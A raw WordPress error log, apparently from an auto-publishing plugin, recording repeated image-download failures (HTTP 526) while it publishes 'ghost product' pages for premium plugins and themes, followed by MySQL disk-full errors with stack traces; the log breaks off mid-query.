Error: [04-Apr-2026 22:25:13 UTC] GPLRock: Image download failed for product quick-view-of-woocommerce-products (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:15 UTC] GPLRock: Image download failed for product quick-view-of-woocommerce-products (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quick-view-of-woocommerce-products-27062.webp for product quick-view-of-woocommerce-products after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:25:18 UTC] GPLRock WARNING: Image download failed for product quick-view-of-woocommerce-products. URL: https://meldwp.com/wp-content/uploads/quick-view-of-woocommerce-products-27062.webp [04-Apr-2026 22:25:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: quick-view-of-woocommerce-products [04-Apr-2026 22:25:18 UTC] GPLRock: Image download failed for product loginstyle-wordpress-login-page-styler (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:20 UTC] GPLRock: Image download failed for product loginstyle-wordpress-login-page-styler (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/loginstyle---wordpress-login-page-styler-15780.webp for product loginstyle-wordpress-login-page-styler after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:25:22 UTC] GPLRock: Image download failed for product loginstyle-wordpress-login-page-styler (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:24 UTC] GPLRock: Image download failed for product loginstyle-wordpress-login-page-styler (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/loginstyle---wordpress-login-page-styler-15780.webp for product loginstyle-wordpress-login-page-styler after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:25:26 UTC] GPLRock WARNING: Image download failed for product loginstyle-wordpress-login-page-styler. URL: https://meldwp.com/wp-content/uploads/loginstyle---wordpress-login-page-styler-15780.webp [04-Apr-2026 22:25:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: loginstyle-wordpress-login-page-styler [04-Apr-2026 22:25:26 UTC] GPLRock: Image download failed for product woocommerce-ceneopl-nokautpl-domodipl-integration (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:28 UTC] GPLRock: Image download failed for product woocommerce-ceneopl-nokautpl-domodipl-integration (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-ceneopl--nokautpl--domodipl-integration-1512.webp for product woocommerce-ceneopl-nokautpl-domodipl-integration after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:25:31 UTC] GPLRock: Image download failed for product woocommerce-ceneopl-nokautpl-domodipl-integration (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:33 UTC] GPLRock: Image download failed for product woocommerce-ceneopl-nokautpl-domodipl-integration (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-ceneopl--nokautpl--domodipl-integration-1512.webp for product woocommerce-ceneopl-nokautpl-domodipl-integration after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:25:35 UTC] GPLRock WARNING: Image download failed for product woocommerce-ceneopl-nokautpl-domodipl-integration. URL: https://meldwp.com/wp-content/uploads/woocommerce-ceneopl--nokautpl--domodipl-integration-1512.webp [04-Apr-2026 22:25:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-ceneopl-nokautpl-domodipl-integration [04-Apr-2026 22:25:35 UTC] GPLRock: Image download failed for product horizontal-timeline-slider-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:37 UTC] GPLRock: Image download failed for product horizontal-timeline-slider-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/horizontal-timeline---slider-addon-for-elementor-32695.webp for product horizontal-timeline-slider-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:25:39 UTC] GPLRock: Image download failed for product horizontal-timeline-slider-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:41 UTC] GPLRock: Image download failed for product horizontal-timeline-slider-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/horizontal-timeline---slider-addon-for-elementor-32695.webp for product horizontal-timeline-slider-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:25:43 UTC] GPLRock WARNING: Image download failed for product horizontal-timeline-slider-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/horizontal-timeline---slider-addon-for-elementor-32695.webp [04-Apr-2026 22:25:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: horizontal-timeline-slider-addon-for-elementor [04-Apr-2026 22:25:44 UTC] GPLRock: Image download failed for product mentor-icon-pack-for-codestar-framework (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:46 UTC] GPLRock: Image download failed for product mentor-icon-pack-for-codestar-framework (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mentor-icon-pack-for-codestar-framework-27382.webp for product mentor-icon-pack-for-codestar-framework after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:25:48 UTC] GPLRock: Image download failed for product mentor-icon-pack-for-codestar-framework (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:50 UTC] GPLRock: Image download failed for product mentor-icon-pack-for-codestar-framework (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mentor-icon-pack-for-codestar-framework-27382.webp for product mentor-icon-pack-for-codestar-framework after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:25:52 UTC] GPLRock WARNING: Image download failed for product mentor-icon-pack-for-codestar-framework. URL: https://meldwp.com/wp-content/uploads/mentor-icon-pack-for-codestar-framework-27382.webp [04-Apr-2026 22:25:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mentor-icon-pack-for-codestar-framework [04-Apr-2026 22:25:52 UTC] GPLRock: Image download failed for product easyorder-b2b-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:54 UTC] GPLRock: Image download failed for product easyorder-b2b-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/easyorder---b2b-plugin-for-woocommerce-28898.webp for product easyorder-b2b-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:25:57 UTC] GPLRock: Image download failed for product easyorder-b2b-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:59 UTC] GPLRock: Image download failed for product easyorder-b2b-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:26:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/easyorder---b2b-plugin-for-woocommerce-28898.webp for product easyorder-b2b-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:26:01 UTC] GPLRock WARNING: Image download failed for product easyorder-b2b-plugin-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/easyorder---b2b-plugin-for-woocommerce-28898.webp [04-Apr-2026 22:26:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: easyorder-b2b-plugin-for-woocommerce [04-Apr-2026 22:26:01 UTC] GPLRock: Image download failed for product wp-setup-wizard (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:26:03 UTC] GPLRock: Image download failed for product wp-setup-wizard (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:26:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-setup-wizard-31795.webp for product wp-setup-wizard after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:26:05 UTC] GPLRock: Image download failed for product wp-setup-wizard (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:26:07 UTC] GPLRock: Image download failed for product wp-setup-wizard (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:26:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-setup-wizard-31795.webp for product wp-setup-wizard after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:26:09 UTC] GPLRock WARNING: Image download failed for product wp-setup-wizard. URL: https://meldwp.com/wp-content/uploads/wp-setup-wizard-31795.webp [04-Apr-2026 22:26:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-setup-wizard [04-Apr-2026 22:26:44 UTC] GPLRock: Image downloaded successfully for product gamipress-points-cards (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ad7c4975.svg [04-Apr-2026 22:26:44 UTC] GPLRock: Using pre-downloaded image for product gamipress-points-cards: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ad7c4975.svg [04-Apr-2026 22:26:44 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-points-cards [04-Apr-2026 22:26:46 UTC] GPLRock: Image downloaded successfully for product gamipress-points-limits (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8ae464c6.jpg [04-Apr-2026 22:26:46 UTC] GPLRock: Using pre-downloaded image for product gamipress-points-limits: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8ae464c6.jpg [04-Apr-2026 22:26:46 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-points-limits [04-Apr-2026 22:26:47 UTC] GPLRock: Image downloaded successfully for product gamipress-woocommerce-points-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3e54ec26.jpg [04-Apr-2026 22:26:47 UTC] GPLRock: Using pre-downloaded image for product gamipress-woocommerce-points-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3e54ec26.jpg [04-Apr-2026 22:26:47 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-woocommerce-points-gateway [04-Apr-2026 22:26:48 UTC] GPLRock: Image downloaded successfully for product woo-product-table-pro-woocommerce-product-table-view-solution (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7fb5705d.jpg [04-Apr-2026 22:26:49 UTC] GPLRock: Using pre-downloaded image for product woo-product-table-pro-woocommerce-product-table-view-solution: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7fb5705d.jpg [04-Apr-2026 22:26:49 UTC] GPLRock: Ghost product published with image - Product ID: woo-product-table-pro-woocommerce-product-table-view-solution [04-Apr-2026 22:26:50 UTC] GPLRock: Image downloaded successfully for product woocommerce-custom-product-addons-custom-product-options (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-98832f6a.jpg [04-Apr-2026 22:26:50 UTC] GPLRock: Using pre-downloaded image for product woocommerce-custom-product-addons-custom-product-options: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-98832f6a.jpg [04-Apr-2026 22:26:50 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-custom-product-addons-custom-product-options [04-Apr-2026 22:26:51 UTC] GPLRock: Image downloaded successfully for product kadence-woocommerce-extras (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b937459a.webp [04-Apr-2026 22:26:51 UTC] GPLRock: Using pre-downloaded image for product kadence-woocommerce-extras: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b937459a.webp [04-Apr-2026 22:26:51 UTC] GPLRock: Ghost product published with image - Product ID: kadence-woocommerce-extras [04-Apr-2026 22:26:53 UTC] GPLRock: Image downloaded successfully for product product-sales-report-pro-for-woocommerce-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-27ce7473.jpg [04-Apr-2026 22:26:53 UTC] GPLRock: Using pre-downloaded image for product product-sales-report-pro-for-woocommerce-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-27ce7473.jpg [04-Apr-2026 22:26:53 UTC] GPLRock: Ghost product published with image - Product ID: product-sales-report-pro-for-woocommerce-pro [04-Apr-2026 22:26:55 UTC] GPLRock: Image downloaded successfully for product logistic-wp-theme-for-transportation-business (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6bd2fc9e.jpg [04-Apr-2026 22:26:55 UTC] GPLRock: Using pre-downloaded image for product logistic-wp-theme-for-transportation-business: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6bd2fc9e.jpg [04-Apr-2026 22:26:55 UTC] GPLRock: Ghost product published with image - Product ID: logistic-wp-theme-for-transportation-business [04-Apr-2026 22:26:56 UTC] GPLRock: Image downloaded successfully for product lmstudy-education-lms-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0060fd1f.jpg [04-Apr-2026 22:26:56 UTC] GPLRock: Using pre-downloaded image for product lmstudy-education-lms-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0060fd1f.jpg [04-Apr-2026 22:26:56 UTC] GPLRock: Ghost product published with image - Product ID: lmstudy-education-lms-woocommerce-theme [04-Apr-2026 22:26:58 UTC] GPLRock: Image downloaded successfully for product woocommerce-file-approval (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c0f4927e.jpg [04-Apr-2026 22:26:58 UTC] GPLRock: Using pre-downloaded image for product woocommerce-file-approval: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c0f4927e.jpg [04-Apr-2026 22:26:58 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-file-approval [04-Apr-2026 22:28:45 UTC] GPLRock: Image download failed for product rectangle-max-admob-gdpr-android-studio (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:28:47 UTC] GPLRock: Image download failed for product rectangle-max-admob-gdpr-android-studio (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:28:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rectangle-max-admob--gdpr--android-studio-9703.webp for product rectangle-max-admob-gdpr-android-studio after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:28:49 UTC] GPLRock: Image download failed for product rectangle-max-admob-gdpr-android-studio (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:28:51 UTC] GPLRock: Image download failed for product rectangle-max-admob-gdpr-android-studio (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:28:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rectangle-max-admob--gdpr--android-studio-9703.webp for product rectangle-max-admob-gdpr-android-studio after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:28:53 UTC] GPLRock WARNING: Image download failed for product rectangle-max-admob-gdpr-android-studio. URL: https://meldwp.com/wp-content/uploads/rectangle-max-admob--gdpr--android-studio-9703.webp [04-Apr-2026 22:28:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rectangle-max-admob-gdpr-android-studio [04-Apr-2026 22:28:53 UTC] GPLRock: Image download failed for product ctl-woocommerce-search-by-sku (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:28:56 UTC] GPLRock: Image download failed for product ctl-woocommerce-search-by-sku (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:28:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ctl-woocommerce-search-by-sku-9068.webp for product ctl-woocommerce-search-by-sku after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:28:58 UTC] GPLRock: Image download failed for product ctl-woocommerce-search-by-sku (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:00 UTC] GPLRock: Image download failed for product ctl-woocommerce-search-by-sku (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ctl-woocommerce-search-by-sku-9068.webp for product ctl-woocommerce-search-by-sku after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:29:02 UTC] GPLRock WARNING: Image download failed for product ctl-woocommerce-search-by-sku. URL: https://meldwp.com/wp-content/uploads/ctl-woocommerce-search-by-sku-9068.webp [04-Apr-2026 22:29:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ctl-woocommerce-search-by-sku [04-Apr-2026 22:29:03 UTC] GPLRock: Image download failed for product provision-image-editor-for-wordpress-woocommerce-with-folders-file-manager (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:05 UTC] GPLRock: Image download failed for product provision-image-editor-for-wordpress-woocommerce-with-folders-file-manager (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/provision-image-editor-for-wordpress--woocommerce-with-folders-file-manager-5690.webp for product provision-image-editor-for-wordpress-woocommerce-with-folders-file-manager after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:29:07 UTC] GPLRock: Image download failed for product provision-image-editor-for-wordpress-woocommerce-with-folders-file-manager (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:09 UTC] GPLRock: Image download failed for product provision-image-editor-for-wordpress-woocommerce-with-folders-file-manager (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/provision-image-editor-for-wordpress--woocommerce-with-folders-file-manager-5690.webp for product provision-image-editor-for-wordpress-woocommerce-with-folders-file-manager after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:29:11 UTC] GPLRock WARNING: Image download failed for product provision-image-editor-for-wordpress-woocommerce-with-folders-file-manager. URL: https://meldwp.com/wp-content/uploads/provision-image-editor-for-wordpress--woocommerce-with-folders-file-manager-5690.webp [04-Apr-2026 22:29:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: provision-image-editor-for-wordpress-woocommerce-with-folders-file-manager [04-Apr-2026 22:29:11 UTC] GPLRock: Image download failed for product varibulkedit-woocommerce-bulk-edit-variations (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:13 UTC] GPLRock: Image download failed for product varibulkedit-woocommerce-bulk-edit-variations (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/varibulkedit---woocommerce-bulk-edit-variations-32447.webp for product varibulkedit-woocommerce-bulk-edit-variations after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:29:20 UTC] GPLRock: Image download failed for product varibulkedit-woocommerce-bulk-edit-variations (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:22 UTC] GPLRock: Image download failed for product varibulkedit-woocommerce-bulk-edit-variations (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/varibulkedit---woocommerce-bulk-edit-variations-32447.webp for product varibulkedit-woocommerce-bulk-edit-variations after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:29:24 UTC] GPLRock WARNING: Image download failed for product varibulkedit-woocommerce-bulk-edit-variations. URL: https://meldwp.com/wp-content/uploads/varibulkedit---woocommerce-bulk-edit-variations-32447.webp [04-Apr-2026 22:29:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: varibulkedit-woocommerce-bulk-edit-variations [04-Apr-2026 22:29:25 UTC] GPLRock: Image download failed for product simple-forum-responsive-bulletin-board (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:27 UTC] GPLRock: Image download failed for product simple-forum-responsive-bulletin-board (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simple-forum---responsive-bulletin-board-31907.webp for product simple-forum-responsive-bulletin-board after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:29:30 UTC] GPLRock: Image download failed for product simple-forum-responsive-bulletin-board (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:32 UTC] GPLRock: Image download failed for product simple-forum-responsive-bulletin-board (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simple-forum---responsive-bulletin-board-31907.webp for product simple-forum-responsive-bulletin-board after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:29:34 UTC] GPLRock WARNING: Image download failed for product simple-forum-responsive-bulletin-board. URL: https://meldwp.com/wp-content/uploads/simple-forum---responsive-bulletin-board-31907.webp [04-Apr-2026 22:29:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: simple-forum-responsive-bulletin-board [04-Apr-2026 22:29:34 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-bd17b2-2fbf.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [04-Apr-2026 22:29:34 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-bd17b2-2fc0.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, hfe_init, Header_Footer_Elementor::instance, Header_Footer_Elementor->__construct, update_option [04-Apr-2026 22:29:34 UTC] GPLRock: Image download failed for product emaily-woocommerce-responsive-email-template-subscriptions-bookings-memberships-compatible (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:34 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-bd17b2-2fc5.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT p.ID, pm.meta_value FROM wpwf_postmeta as pm INNER JOIN wpwf_posts as p ON pm.post_id = p.ID WHERE pm.meta_key = 'ehf_target_include_locations' AND p.post_type = 'elementor-hf' AND p.post_status = 'publish' AND (pm.meta_value LIKE '%\"basic-global\"%' OR pm.meta_value LIKE '%\"special-blog\"%') ORDER BY p.post_date DESC made by require('wp-blog-header.php'), wp, WP->main, do_action_ref_array('wp'), WP_Hook->do_action, WP_Hook->apply_filters, HFE_Elementor_Canvas_Compat->hooks, hfe_header_enabled, Header_Footer_Elementor::get_settings, Header_Footer_Elementor::get_template_id, HFE\Lib\Astra_Target_Rules_Fields->get_posts_by_conditions [04-Apr-2026 22:29:34 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-bd17b2-2fc6.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT wpwf_posts.* FROM wpwf_posts INNER JOIN wpwf_postmeta ON ( wpwf_posts.ID = wpwf_postmeta.post_id ) WHERE 1=1 AND ( ( wpwf_postmeta.meta_key = 'elementskit_template_activation' AND wpwf_postmeta.meta_value = 'yes' ) ) AND wpwf_posts.post_type = 'elementskit_template' AND ((wpwf_posts.post_status = 'publish')) GROUP BY wpwf_posts.ID ORDER BY wpwf_posts.post_date DESC made by require('wp-blog-header.php'), wp, WP->main, do_action_ref_array('wp'), WP_Hook->do_action, WP_Hook->apply_filters, ElementsKit_Lite\Modules\Header_Footer\Activator->hooks, ElementsKit_Lite\Modules\Header_Footer\Activator::template_ids, ElementsKit_Lite\Modules\Header_Footer\Activator->the_filter, get_posts, WP_Query->query, WP_Query->get_posts [04-Apr-2026 22:29:35 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-bd17b2-2fc8.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), do_action('template_redirect'), WP_Hook->do_action, WP_Hook->apply_filters, GPLRock\Public_Frontend->template_redirect, GPLRock\Public_Frontend->display_ghost_content, GPLRock\Public_Frontend->display_ghost_page, include('/plugins/gplrock-auto-publisher/templates/ghost-single.php'), get_header, locate_template, load_template, require_once('/themes/hello-elementor/header.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, wp_enqueue_scripts, do_action('wp_enqueue_scripts'), WP_Hook->do_action, WP_Hook->apply_filters, Elementor\Modules\DesignSystemSync\Module->enqueue_sync_stylesheet, Elementor\Modules\DesignSystemSync\Classes\Stylesheet_Manager->enqueue, Elementor\Modules\DesignSystemSync\Classes\Stylesheet_Manager->generate, Elementor\Core\Files\Base->update, Elementor\Core\Files\Base->update_file, Elementor\Core\Files\Base->delete, Elementor\Core\Files\Base->delete_meta, delete_option [04-Apr-2026 22:29:35 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-bd17b2-2fc9.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT wpwf_posts.* FROM wpwf_posts INNER JOIN wpwf_postmeta ON ( wpwf_posts.ID = wpwf_postmeta.post_id ) INNER JOIN wpwf_postmeta AS mt1 ON ( wpwf_posts.ID = mt1.post_id ) WHERE 1=1 AND ( wpwf_postmeta.meta_key = '_elementor_priority' AND ( ( mt1.meta_key = '_elementor_location' AND mt1.meta_value = 'elementor_head' ) ) ) AND wpwf_posts.post_type = 'elementor_snippet' AND ((wpwf_posts.post_status = 'publish')) GROUP BY wpwf_posts.ID ORDER BY wpwf_postmeta.meta_value+0 ASC made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), do_action('template_redirect'), WP_Hook->do_action, WP_Hook->apply_filters, GPLRock\Public_Frontend->template_redirect, GPLRock\Public_Frontend->display_ghost_content, GPLRock\Public_Frontend->display_ghost_page, include('/plugins/gplrock-auto-publisher/templates/ghost-single.php'), get_header, locate_template, load_template, require_once('/themes/hello-elementor/header.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, ElementorPro\Modules\CustomCode\Module->ElementorPro\Modules\CustomCode\{closure}, ElementorPro\Modules\CustomCode\Module->print_snippets, ElementorPro\Modules\CustomCode\Module->get_snippets_by_location, get_posts, WP_Query->query, WP_Query->get_posts [04-Apr-2026 22:29:35 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-bd17b2-2fca.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT wpwf_posts.* FROM wpwf_posts INNER JOIN wpwf_postmeta ON ( wpwf_posts.ID = wpwf_postmeta.post_id ) INNER JOIN wpwf_postmeta AS mt1 ON ( wpwf_posts.ID = mt1.post_id ) WHERE 1=1 AND ( wpwf_postmeta.meta_key = '_elementor_priority' AND ( ( mt1.meta_key = '_elementor_location' AND mt1.meta_value = 'elementor_body_start' ) ) ) AND wpwf_posts.post_type = 'elementor_snippet' AND ((wpwf_posts.post_status = 'publish')) GROUP BY wpwf_posts.ID ORDER BY wpwf_postmeta.meta_value+0 ASC made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), do_action('template_redirect'), WP_Hook->do_action, WP_Hook->apply_filters, GPLRock\Public_Frontend->template_redirect, GPLRock\Public_Frontend->display_ghost_content, GPLRock\Public_Frontend->display_ghost_page, include('/plugins/gplrock-auto-publisher/templates/ghost-single.php'), get_header, locate_template, load_template, require_once('/themes/hello-elementor/header.php'), wp_body_open, do_action('wp_body_open'), WP_Hook->do_action, WP_Hook->apply_filters, ElementorPro\Modules\CustomCode\Module->ElementorPro\Modules\CustomCode\{closure}, ElementorPro\Modules\CustomCode\Module->print_snippets, ElementorPro\Modules\CustomCode\Module->get_snippets_by_location, get_posts, WP_Query->query, WP_Query->get_posts [04-Apr-2026 22:29:35 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-bd17b2-2fcb.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT p.product_id, p.title, p.category, p.version, p.downloads_count, p.description, 